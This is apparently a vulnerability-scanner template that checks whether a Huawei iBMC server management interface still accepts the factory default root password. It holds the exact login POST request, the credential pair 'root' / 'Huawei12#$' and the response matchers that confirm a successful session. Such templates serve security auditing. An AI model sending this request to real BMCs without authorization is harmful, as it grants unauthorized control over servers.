id: huawei-ibmc-login
finger:
  - Huawei ibmc
info:
  author: pdteam
  name: huawei-ibmc-default-password
  severity: high
  tags: huawei
requests:
  - raw:
      - |
        POST /bmc/php/processparameter.php HTTP/1.1
        Host: {{Host}}
        User-Agent: 11111
        Content-Type: application/x-www-form-urlencoded

        check_pwd={{pass}}&logtype=0&user_name={{user}}&func=AddSession
    attack: pitchfork
    matchers:
      - status:
          - 200
        type: status
      - type: word
        words:
          - AddSession
    matchers-condition: and
    payloads:
      pass:
        - Huawei12%23%24
      user:
        - root
